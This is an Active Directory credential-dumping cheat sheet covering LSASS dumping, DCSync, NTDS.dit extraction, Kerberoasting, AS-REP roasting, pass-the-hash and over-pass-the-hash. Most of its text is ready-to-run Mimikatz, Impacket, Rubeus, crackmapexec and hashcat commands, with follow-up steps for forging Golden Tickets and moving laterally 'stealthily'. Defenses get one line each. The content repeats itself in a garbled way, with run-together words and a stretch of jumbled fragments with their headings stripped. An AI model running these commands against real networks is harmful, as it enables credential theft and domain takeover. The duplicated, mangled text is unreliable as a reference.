📚 1. LSASS DUMPING

• What It Is:

Dump live memory from LSASS.exe to steal credentials.

• Target:

LSASS memory on Windows.

• Prerequisites:

Local Admin or SYSTEM rights on the machine.

• Tools:

Mimikatz
ProcDump

• Commands to Exploit:

Mimikatz:

privilege::debug
sekurlsa::logonpasswords

ProcDump:

procdump.exe -ma lsass.exe lsass.dmp
(then open with Mimikatz)
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

• Output:

NTLM hashes
Plaintext passwords (sometimes)
Kerberos TGT tickets

• After Dump — Attack Steps:

Use NTLM hashes for Pass-the-Hash attack (crackmapexec, evil-winrm).
Extract Kerberos tickets (`sekurlsa::tickets`) and reuse via Kerberos injection (Over-PtH or Pass-the-Ticket attack).
Crack plaintext passwords (if dumped) and escalate.

• Defenses:

Credential Guard, LSASS PPL, EDR monitoring LSASS access.

📚 2. DCSYNC ATTACK

• What It Is:

Impersonate a DC to replicate and steal AD secrets remotely.

• Target:

Domain Controller (via replication protocols)

• Prerequisites:

DS-Replication-Get-Changes and DS-Replication-Get-Changes-All permissions.

• Tools:

Mimikatz

• Commands to Exploit:

lsadump::dcsync /domain:<domain> /user:<targetuser>

(Example: lsadump::dcsync /domain:corp.local /user:krbtgt)

• Output:

NTLM hashes of all domain users
krbtgt hash

• After DCSync — Attack Steps:

Use any admin NTLM hash for Pass-the-Hash attack (SMB, WinRM).
Use krbtgt hash to forge Golden Ticket with Mimikatz:
```
kerberos::golden /user:<user> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash>
```
→ Complete Domain Admin access stealthily!

• Defenses:

Restrict replication permissions, monitor DCSync behavior.

📚 3. NTDS.dit + SYSTEM HIVE EXTRACTION

• What It Is:

Extract domain user database and decryption key.

• Target:

NTDS.dit file + SYSTEM registry hive.

• Prerequisites:

SYSTEM-level file access.

• Tools:

secretsdump.py
Mimikatz
DSInternals

• Commands to Exploit:

Using secretsdump:

secretsdump.py -just-dc username@target

Or manual:

ntfsutil -> create snapshot
reg save HKLM\SYSTEM C:\dump\SYSTEM
copy NTDS.dit
parse using DSInternals or Mimikatz

• Output:

NTLM hashes of all domain users.

• After Dump — Attack Steps:

Use admin user NTLM hash for PtH attack to access systems.
Crack service accounts' passwords to escalate privileges or move laterally.
Forge Golden Tickets if krbtgt hash extracted.

• Defenses:

Protect DC filesystem access, monitor Volume Shadow Copies.

📚 4. KERBEROASTING

• What It Is:

Request SPN service tickets (TGS) and crack offline.

• Target:

Service accounts with SPNs.

• Prerequisites:

Any domain user account.

• Tools:

Impacket's GetUserSPNs.py
Rubeus
Mimikatz

• Commands to Exploit:

GetUserSPNs.py domain/user:password -dc-ip <dc-ip> -request

Rubeus.exe kerberoast

• Output:

TGS tickets encrypted with service account password hash.

• After Extraction — Attack Steps:

Crack TGS ticket offline using Hashcat or John the Ripper.
(Example: `hashcat -m 13100 <hashfile> <wordlist>`)
Use cracked password to impersonate service account — escalate to Domain Admin (if service account is privileged).

• Defenses:

Use gMSAs, rotate service account passwords, enforce long and complex passwords.

📚 5. AS-REP ROASTING

• What It Is:

Exploit accounts without pre-authentication and crack their AS-REP offline.

• Target:

Users with "Do not require Kerberos pre-auth" flag.

• Prerequisites:

Any domain user account.

• Tools:

Impacket's GetNPUsers.py
Rubeus

• Commands to Exploit:

GetNPUsers.py domain/user:password -dc-ip <dc-ip> -no-pass

Rubeus.exe asreproast

• Output:

Encrypted AS-REP blobs for vulnerable accounts.

• After Extraction — Attack Steps:

Crack AS-REP offline using Hashcat (e.g., `hashcat -m 18200 <hashfile> <wordlist>`)
Use cracked password to login or escalate.

• Defenses:

Force pre-authentication for all users, audit vulnerable accounts.

📚 6. PASS-THE-HASH (PtH)

• What It Is:

Authenticate to systems using NTLM hash directly.

• Target:

Protocols using NTLM (SMB, WinRM).

• Prerequisites:

Captured NTLM hash.

• Tools:

crackmapexec
evil-winrm

• Commands to Exploit:

crackmapexec smb <target-ip> -u <username> -H <hash>

evil-winrm -i <target> -u <user> -H <hash>

• Output:

Remote shell
File access

• After Hash Capture — Attack Steps:

Move laterally across network.
Steal more secrets or escalate privileges.

• Defenses:

Disable NTLM, enable Credential Guard, monitor abnormal logins.

📚 7. OVER-PASS-THE-HASH (Over-PtH)

• What It Is:

Forge Kerberos TGT from NTLM hash.

• Target:

Kerberos authentication.

• Prerequisites:

Captured NTLM hash.

• Tools:

Mimikatz

• Commands to Exploit:

sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>

• Output:

Kerberos TGT injected into session.

• After Forgery — Attack Steps:

Use Kerberos authentication (instead of NTLM).
Access domain resources stealthily.

• Defenses:

Monitor Kerberos tickets, protect hashes, enable EDR monitoring.

2. AD Pentest - Credentials Dumping

📚 1. LSASS DUMPING

• What It Is:

Dump live memory from LSASS.exe to steal credentials.

• Target:

LSASS memory on Windows.

• Prerequisites:

Local Admin or SYSTEM rights on the machine.

• Tools:

MimikatzProcDump

• Commands to Exploit:

Mimikatz:privilege::debug sekurlsa::logonpasswords ProcDump:procdump.exe -ma lsass.exe lsass.dmp (then open with Mimikatz) sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords

• Output:

NTLM hashesPlaintext passwords (sometimes)Kerberos TGT tickets

• After Dump — Attack Steps:

Use NTLM hashes for Pass-the-Hash attack (crackmapexec, evil-winrm).Extract Kerberos tickets (sekurlsa::tickets) and reuse via Kerberos injection (Over-PtH or Pass-the-Ticket attack).Crack plaintext passwords (if dumped) and escalate.

• Defenses:

Credential Guard, LSASS PPL, EDR monitoring LSASS access.

📚 2. DCSYNC ATTACK

• What It Is:

Impersonate a DC to replicate and steal AD secrets remotely.

• Target:

Domain Controller (via replication protocols)

• Prerequisites:

DS-Replication-Get-Changes and DS-Replication-Get-Changes-All permissions.

• Tools:

Mimikatz

• Commands to Exploit:

lsadump::dcsync /domain:<domain> /user:<targetuser> (Example: lsadump::dcsync /domain:corp.local /user:krbtgt)

• Output:

NTLM hashes of all domain userskrbtgt hash

• After DCSync — Attack Steps:

Use any admin NTLM hash for Pass-the-Hash attack (SMB, WinRM).Use krbtgt hash to forge Golden Ticket with Mimikatz:kerberos::golden /user:<user> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash> → Complete Domain Admin access stealthily!

• Defenses:

Restrict replication permissions, monitor DCSync behavior.

📚 3. NTDS.dit + SYSTEM HIVE EXTRACTION

• What It Is:

Extract domain user database and decryption key.

• Target:

NTDS.dit file + SYSTEM registry hive.

• Prerequisites:

SYSTEM-level file access.

• Tools:

secretsdump.pyMimikatzDSInternals

• Commands to Exploit:

Using secretsdump:secretsdump.py -just-dc username@target Or manual:ntfsutil -> create snapshot reg save HKLM\SYSTEM C:\dump\SYSTEM copy NTDS.dit parse using DSInternals or Mimikatz

• Output:

NTLM hashes of all domain users.

• After Dump — Attack Steps:

Use admin user NTLM hash for PtH attack to access systems.Crack service accounts' passwords to escalate privileges or move laterally.Forge Golden Tickets if krbtgt hash extracted.

• Defenses:

Protect DC filesystem access, monitor Volume Shadow Copies.

📚 4. KERBEROASTING

• What It Is:

Request SPN service tickets (TGS) and crack offline.

• Target:

Service accounts with SPNs.

• Prerequisites:

Any domain user account.

• Tools:

Impacket's GetUserSPNs.pyRubeusMimikatz

• Commands to Exploit:

GetUserSPNs.py domain/user:password -dc-ip <dc-ip> -request orRubeus.exe kerberoast

• Output:

TGS tickets encrypted with service account password hash.

• After Extraction — Attack Steps:

Crack TGS ticket offline using Hashcat or John the Ripper.(Example: hashcat -m 13100 <hashfile> <wordlist>)Use cracked password to impersonate service account — escalate to Domain Admin (if service account is privileged).

• Defenses:

Use gMSAs, rotate service account passwords, enforce long and complex passwords.

📚 5. AS-REP ROASTING

• What It Is:

Exploit accounts without pre-authentication and crack their AS-REP offline.

• Target:

Users with "Do not require Kerberos pre-auth" flag.

• Prerequisites:

Any domain user account.

• Tools:

Impacket's GetNPUsers.pyRubeus

• Commands to Exploit:

GetNPUsers.py domain/user:password -dc-ip <dc-ip> -no-pass orRubeus.exe asreproast

Mimikatz
ProcDump

Mimikatz:
`privilege::debug sekurlsa::logonpasswords`
ProcDump:
`procdump.exe -ma lsass.exe lsass.dmp (then open with Mimikatz) sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords`

NTLM hashes
Plaintext passwords (sometimes)
Kerberos TGT tickets

Use NTLM hashes for Pass-the-Hash attack (crackmapexec, evil-winrm).
Extract Kerberos tickets (`sekurlsa::tickets`) and reuse via Kerberos injection (Over-PtH or Pass-the-Ticket attack).
Crack plaintext passwords (if dumped) and escalate.

`lsadump::dcsync /domain:<domain> /user:<targetuser>`
(Example: `lsadump::dcsync /domain:corp.local /user:krbtgt`)

NTLM hashes of all domain users
krbtgt hash

Use any admin NTLM hash for Pass-the-Hash attack (SMB, WinRM).
Use krbtgt hash to forge Golden Ticket with Mimikatz:
`kerberos::golden /user:<user> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash>`
→ Complete Domain Admin access stealthily!

secretsdump.py
Mimikatz
DSInternals

Using secretsdump:
`secretsdump.py -just-dc username@target`
Or manual:
`ntfsutil -> create snapshot reg save HKLM\SYSTEM C:\dump\SYSTEM copy NTDS.dit parse using DSInternals or Mimikatz`

Use admin user NTLM hash for PtH attack to access systems.
Crack service accounts' passwords to escalate privileges or move laterally.
Forge Golden Tickets if krbtgt hash extracted.

Impacket's GetUserSPNs.py
Rubeus
Mimikatz

`GetUserSPNs.py domain/user:password -dc-ip <dc-ip> -request`
or
`Rubeus.exe kerberoast`

Crack TGS ticket offline using Hashcat or John the Ripper.
(Example: `hashcat -m 13100 <hashfile> <wordlist>`)
Use cracked password to impersonate service account — escalate to Domain Admin (if service account is privileged).

Impacket's GetNPUsers.py
Rubeus

`GetNPUsers.py domain/user:password -dc-ip <dc-ip> -no-pass`
or
`Rubeus.exe asreproast`

Crack AS-REP offline using Hashcat (e.g., `hashcat -m 18200 <hashfile> <wordlist>`)
Use cracked password to login or escalate.

crackmapexec
evil-winrm

`crackmapexec smb <target-ip> -u <username> -H <hash>`
or
`evil-winrm -i <target> -u <user> -H <hash>`

Remote shell
File access

Move laterally across network.
Steal more secrets or escalate privileges.

`sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>`

Use Kerberos authentication (instead of NTLM).
Access domain resources stealthily.